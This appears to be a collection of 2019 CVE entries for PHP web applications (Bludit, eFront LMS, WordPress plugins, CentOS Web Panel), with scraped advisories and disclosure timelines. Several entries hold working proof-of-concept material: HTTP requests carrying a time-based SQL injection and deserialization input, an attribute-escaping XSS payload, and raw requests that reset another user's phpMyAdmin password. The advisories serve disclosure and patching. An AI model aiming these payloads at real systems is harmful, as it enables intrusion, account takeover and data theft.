Cross site scripting (XSS) in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via admin/models/Galleries.php.

CVE-2019-16117

Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

**A Code Execution Vulnerability in Bludit v3.9.2**

Hi,  
For CVE ID,so I open a new issue,sorry about that.And I think you haven't completely fixed the bug.

There is a new Code Execution Vulnerability which allow to get server permissions,the path is /bl-kernel/admin/ajax/upload-images.php

**1, login with any account which allows you to edit conten**

![image](https://user-images.githubusercontent.com/35037256/64474218-c31fe580-d1a4-11e9-91cd-cb98f4e4ce55.png)

**2.upload the evil jpg**

We can specify the location of the uploaded file by changing the value of the uuid,then upload the evil picture to tmp folder  
![image](https://user-images.githubusercontent.com/35037256/64474256-5c4efc00-d1a5-11e9-8654-04f228c26420.png)  
![image](https://user-images.githubusercontent.com/35037256/64474260-6a048180-d1a5-11e9-8298-f0a10f3ff872.png)

**3.upload both the.htaccess file and the access target jpg**

![image](https://user-images.githubusercontent.com/35037256/64474270-a89a3c00-d1a5-11e9-9b1d-9c9667b0502f.png)  
![image](https://user-images.githubusercontent.com/35037256/64474288-dda68e80-d1a5-11e9-97c7-b927fddaf877.png)

![image](https://user-images.githubusercontent.com/35037256/64474313-25c5b100-d1a6-11e9-8e29-bc9f2efc62fa.png)  
Successfully reverted to the target file

**4\. Access the evil file that are written through jpg**

![image](https://user-images.githubusercontent.com/35037256/64474346-76d5a500-d1a6-11e9-8b3d-d1bbef90aab5.png)

So I recommend checking the file before uploading it to temporary directory

CVE-2019-16113: Bludit v3.9.2 Code Execution Vulnerability in "Upload function"  · Issue #1081 · bludit/bludit

A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Summary**

A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Tested Versions**

Epignosis eFront LMS v5.2.12

**Product URLs**

https://www.efrontlearning.com/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-502 - Deserialization of Untrusted Data

**Details**

Cisco Talos discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

The following proof of concept demonstrates the issue:

    POST /audiences/add/1 HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[IP]/audiences/add/1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 168
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=aaaaaaaa;
    Upgrade-Insecure-Requests: 1
    
    ratio=undefined&_qf__audience_properties_form=&qfS_csrf=abc&name=[UNSERIALIZED DATA]&description=jh&active=1&branches_ID=&submit=Add
    

The following code is responsible for all observed unsafe unserializations:

    205     public function set($property, $value, $type = null) {
    206         // $this->$property translates to the variable name, for example $this->_name or $this->_address:
    207         if ($value !== $this->$property) {
    208             // The default type to check against is 'generic', which cuts off non-scalar values:
    209             !empty($type) OR $type = 'generic';
    210
    211             if (!empty($value) && BaseModel::checkParameter($value, $type) === false) {
    212                 throw new EfrontException("Invalid type '{$type}' for '{$property}'");
    213             }
    214
    215             if ($value && $type == 'generic' && @unserialize($value) === false) {
    216                 $value = htmlspecialchars(strip_tags($value), ENT_COMPAT, 'UTF-8',false);
    217             } else if ($value && $type == 'wysiwig') {
    218                 $value = TemplateController::purify($value);
    219             }
    220
    221             $this->$property = $value;
    222             $this->_must_persist = true;
    223         }
    224
    225         return $this;
    226     }
    

Forms submitted to the following URLs were discovered to be vulnerable:

    http://[IP]/Banners/add/1 [name parameter]
    http://[IP]/Glossary/add/1 [term parameter]
    http://[IP]/RandomDataPopulator/add/1 [name parameter]
    http://[IP]/audiences/add/1 [name parameter]
    http://[IP]/branches/add/1 [name parameter]
    http://[IP]/categories/add/1 [name parameter]
    http://[IP]/certificates/add/1 [name parameter]
    http://[IP]/curriculums/add/1 [name parameter]
    http://[IP]/discussions/course-id/180/add-topic/1/popup/1 [title parameter]
    http://[IP]/jobs/add/1 [name parameter]
    http://[IP]/payments/op/price_tracks/add/1 [discount_type parameter]
    http://[IP]/reports/op/courses [filter_name parameter]
    http://[IP]/skill-tests/add/1/quick-add/1 [name parameter]
    http://[IP]/skills/add/1 [name parameter]
    

**Timeline**

2019-07-29 - Vendor disclosure  
2019-07-31 - Vendor acknowledged issues under review  
2019-08-13 - Vendor acknowledged work to fix issues & testing  
2019-08-30 - Vendor patched/released new version  
2019-09-03 - Public disclosure

CVE-2019-5069: TALOS-2019-0858 || Cisco Talos Intelligence Group

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Summary**

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Tested Versions**

Epignosis eFront LMS v5.2.12

**Product URLs**

https://www.efrontlearning.com/

**CVSSv3 Score**

6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

**CWE**

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Details**

The following parameters are vulnerable to unauthenticated SQL injection attacks:

PHPSessionID parameter:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
    Upgrade-Insecure-Requests: 1
    

PoC:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
    Upgrade-Insecure-Requests: 1
    

**Timeline**

2019-07-29 - Vendor disclosure  
2019-07-31 - Vendor acknowledged issues under review  
2019-08-13 - Vendor acknowledged work to fix issues & testing  
2019-08-30 - Vendor patched/released new version  
2019-09-03 - Public disclosure

CVE-2019-5070: TALOS-2019-0859 || Cisco Talos Intelligence Group

The rsvpmaker plugin before 6.2 for WordPress has SQL injection.

CVE-2019-15646: RSVPMaker

The ad-inserter plugin before 2.4.20 for WordPress has path traversal.

CVE-2019-15323: Ad Inserter – Ad Manager & AdSense Ads

The give plugin before 2.4.7 for WordPress has XSS via a donor name.

**Exploitation Level:** Medium / Remote

**DREAD Score:** 6.6

**Vulnerability:** Stored XSS on an administrative page

**Patched Version:** 2.4.7

​​Give is a WordPress plugin which allows users to setup a donation page on a website. It currently has 60k installs.

​​During a recent audit of the plugin, we found a severe vulnerability which allows donors to inject arbitrary code on an administrative page.

​​If you are using a version lower than **2.4.7,** you should update immediately.

> Note: A forced update was pushed by the developers, and all affected users should now be patched and protected against this vulnerability.

​​When creating a donation, all of the arguments are sanitized as text fields, but this method does not take into consideration where the variables are reflected. Thanks to this oversight, a malicious user can still perform an injection on the donors page after making a donation.

​​Due to the reflection point, the injection can only be seen by users with sufficient permissions to see the donors — this means that a malicious script could do a lot of damage while acting as these users.

****​​Timeline****

*   ​​**2019-05-03**: Initial disclosure to Give
*   ​​**2019-05-07**: Partial patch released (2.4.6)
*   ​​**2019-05-10**: Notified vendor of possible bypasses
*   ​​**2019-05-14**: Complete patch released (2.4.7)
*   **2019-05-21**: Patch pushed to all customers via auto-update

****​​Technical Details****

​​When processing a donation, the plugin recursively sanitizes every POSTed variable using the sanitize\_text\_field method.

​​The function handling the donation form

​​The function recursively cleaning text fields

​​Under this plugin, a **Donation** uses multiple data structures:

*   ​​**Donation**, which contains the donation content itself.

*   **Donor**, which contains the data related to the user performing the donation.

​​​​If the user performing the donation is a guest, meaning this is the first donation using this email, a new donor will be created with the provided information.

​​Donor creation

​​Under the admin panel, you can see either one of the two created entities by the donation: The **Donors** and The **Donations**.

​​Both of these pages are tables where we can see, filter, and modify the data. On the Donors table, few custom attributes are added on tags to facilitate the website interactivity. Among these is the _data-name_ attribute, which has the donor name value. As you can see on the donor creation code, this value is the full name of the donor. This attribute is used on two tags: The row tag and the column checkbox input.

​​The code can be found under _class-donor-table.php:_

​​Injection on the table row tag

​​Injection on the column checkbox

​​The name of our user was sanitized using the _sanitize\_text\_field_ method, which performs the following actions per the WordPress documentation:

*   ​​Checks for invalid UTF-8

*   ​​Converts single < characters to entities

*   ​​Strips all tags

*   ​​Removes line breaks, tabs, and extra whitespace

*   ​​Strips octets

​​You might notice it removes the **_tags_**, but it does not mention being safe as **_attribute._** ​​With that in mind, it is possible to escape the _data-name_ attribute and add an event on the input.

​Having the following name:

_Name " onfocus="alert(document.domain)" autofocus="_

gives us the following HTML on the input injection:

_<input class="donor-selector" type="checkbox" name="donor\[\]" value="1"_ 

  _data-name="Name_ **_"_** 

  **_onfocus="alert(document.domain)"_** 

  **_autofocus=""_** _/>_

Using the autofocus attributes will trigger the onfocus event without user interaction, which can execute malicious code.

**Conclusion**

Cross-site scripting (XSS) is a widespread vulnerability that allows an attacker to inject malicious content into a site.

In the case of Stored XSS (as seen with this particular vulnerability), the payload is stored in the site’s database and retrieved with every page request. If left unpatched, it can be very dangerous, as an attacker acting as a donor can obtain complete control of the browser environment.

To protect against this vulnerability, we strongly encourage **Give** users to update to **version 2.4.7** as soon as possible. In the event that you can’t immediately update your plugin, you can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

Antony Garand is Sucuri's Threat Researcher who joined the company in 2019. Antony's main responsibilities include researching vulnerabilities and dissecting malware. His professional experience covers many years of security research and development. When Antony isn't breaking stuff, you might find him at the dog park or learning new skills. Connect with him on Twitter

**Reader Interactions**

CVE-2019-15317: WordPress Plugin Give - Stored XSS for Donors

The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

CVE-2015-9333: cformsII

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, CSRF in the forgot password function allows an attacker to change the password for the root account.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

CVE-2019-13476 (XSS) + CVE-2019-13477 (CSRF) Can change password no need to know current password

  
**Reproduce**

1.  login as normal user

  

2.  Click at Email Accounts under the Email Accounts and click it again like image below

  

3.  Click add "New MailBox"

  

4.  add "New mail" and intercept request (use Burp suite for intercept request)

  

5.  Insert payload at parameter "domain" then click "intercept is on" in burp suite

  

6.  Payload added success (in mail box panel user it's doesn't exist after add payload XSS but in panel admin it's will exist)

Script change password (PoC.php)

  

7.  Login as user root (victim) user : root pass : P@ssw0rd

  

8.  After login we will see the left side tap and click at "Email" then click "Email Accounts" under "Email" like image below

  

9.  We can see payload

  

10.  Click any button such as Change Password, Suspend, Delete after click Payload will be executed.

  

11.  After click it's will be redirect and password has been changed password is "AttackerPassword"

  

12.  try to login with old password "P@ssw0rd" we got login failed (image below)

  

13.  Login as root and new password "AttackerPassword"

  

14.  Login success

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13477: CentOS-Control-Web-Panel-CVE/CVE-2019-13477.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

Tag

#php